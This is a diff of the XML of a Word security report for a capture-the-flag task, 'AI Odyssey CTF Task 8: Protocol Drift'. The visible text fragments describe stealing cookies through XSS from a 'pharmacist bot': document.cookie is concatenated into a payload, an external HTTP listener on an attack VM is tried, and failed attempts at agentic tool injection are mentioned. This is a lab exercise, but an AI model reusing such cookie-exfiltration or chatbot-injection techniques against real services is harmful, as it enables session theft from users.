+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>/..</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>/</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -3088,12 +3136,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -3193,12 +3235,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -3252,6 +3288,7 @@
               <w:t xml:space="preserve">External HTTP listener on attack VM (python3 -m </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="20"/>
@@ -3260,6 +3297,7 @@
               <w:t>http.server</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="20"/>
@@ -3292,18 +3330,28 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>FAILED — network isolation between target container and VM</w:t>
+              <w:t xml:space="preserve">FAILED — network isolation between target </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>container</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and VM</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -3387,12 +3435,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -3508,12 +3550,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -3597,12 +3633,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -3686,12 +3716,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -3859,10 +3883,12 @@
         <w:t xml:space="preserve"> pattern. </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>document.cookie</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> is readable in the pharmacist bot’s server-side rendering context (the </w:t>
       </w:r>
@@ -4019,6 +4045,7 @@
         <w:t>='+</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -4029,6 +4056,7 @@
         <w:t>document.cookie</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -4265,12 +4293,6 @@
         <w:gridCol w:w="9360"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
@@ -4354,12 +4376,6 @@
         <w:gridCol w:w="6360"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:tblHeader/>
         </w:trPr>
@@ -4425,12 +4441,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="3000" w:type="dxa"/>
@@ -4487,12 +4497,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="3000" w:type="dxa"/>
@@ -4571,6 +4575,7 @@
               <w:t xml:space="preserve"> cookie flag. Trusting this caused days of misdirection around </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="20"/>
@@ -4579,6 +4584,7 @@
               <w:t>document.cookie</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="20"/>
@@ -4590,12 +4596,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="3000" w:type="dxa"/>
@@ -4652,12 +4652,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="3000" w:type="dxa"/>
@@ -4714,12 +4708,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="3000" w:type="dxa"/>
@@ -4776,12 +4764,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="3000" w:type="dxa"/>
@@ -4832,18 +4814,28 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>Every failed attempt involved unnecessary complexity: absolute URLs, external listeners, custom headers, agentic tool injection. The winning payload was 90 characters and used only basic XSS primitives.</w:t>
+              <w:t>Every failed attempt involved unnecessary complexity: absolute URLs, external listeners, custom headers</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>, agentic</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> tool injection. The winning payload was 90 characters and used only basic XSS primitives.</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="3000" w:type="dxa"/>
@@ -4980,7 +4972,43 @@
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
       </w:rPr>
-      <w:t xml:space="preserve">AI Odyssey CTF  —  Task 8: Protocol Drift  —  </w:t>
+      <w:t xml:space="preserve">AI Odyssey </w:t>
+    </w:r>
+    <w:proofErr w:type="gramStart"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="AAAAAA"/>
+        <w:sz w:val="16"/>
+        <w:szCs w:val="16"/>
+      </w:rPr>
+      <w:t>CTF  —</w:t>
+    </w:r>
+    <w:proofErr w:type="gramEnd"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="AAAAAA"/>
+        <w:sz w:val="16"/>
+        <w:szCs w:val="16"/>
+      </w:rPr>
+      <w:t xml:space="preserve">  Task 8: Protocol </w:t>
+    </w:r>
+    <w:proofErr w:type="gramStart"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="AAAAAA"/>
+        <w:sz w:val="16"/>
+        <w:szCs w:val="16"/>
+      </w:rPr>
+      <w:t>Drift  —</w:t>
+    </w:r>
+    <w:proofErr w:type="gramEnd"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="AAAAAA"/>
+        <w:sz w:val="16"/>
+        <w:szCs w:val="16"/>
+      </w:rPr>
+      <w:t xml:space="preserve">  </w:t>
     </w:r>
     <w:proofErr w:type="spellStart"/>
     <w:r>
@@ -5032,7 +5060,43 @@
         <w:sz w:val="18"/>
         <w:szCs w:val="18"/>
       </w:rPr>
-      <w:t>AI Odyssey CTF  |  Task 8: Protocol Drift  |  Security Report</w:t>
+      <w:t xml:space="preserve">AI Odyssey </w:t>
+    </w:r>
+    <w:proofErr w:type="gramStart"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="888888"/>
+        <w:sz w:val="18"/>
+        <w:szCs w:val="18"/>
+      </w:rPr>
+      <w:t>CTF  |</w:t>
+    </w:r>
+    <w:proofErr w:type="gramEnd"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="888888"/>
+        <w:sz w:val="18"/>
+        <w:szCs w:val="18"/>
+      </w:rPr>
+      <w:t xml:space="preserve">  Task 8: Protocol </w:t>
+    </w:r>
+    <w:proofErr w:type="gramStart"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="888888"/>
+        <w:sz w:val="18"/>
+        <w:szCs w:val="18"/>
+      </w:rPr>
+      <w:t>Drift  |</w:t>
+    </w:r>
+    <w:proofErr w:type="gramEnd"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="888888"/>
+        <w:sz w:val="18"/>
+        <w:szCs w:val="18"/>
+      </w:rPr>
+      <w:t xml:space="preserve">  Security Report</w:t>
     </w:r>
     <w:r>
       <w:rPr>

</xml_diff>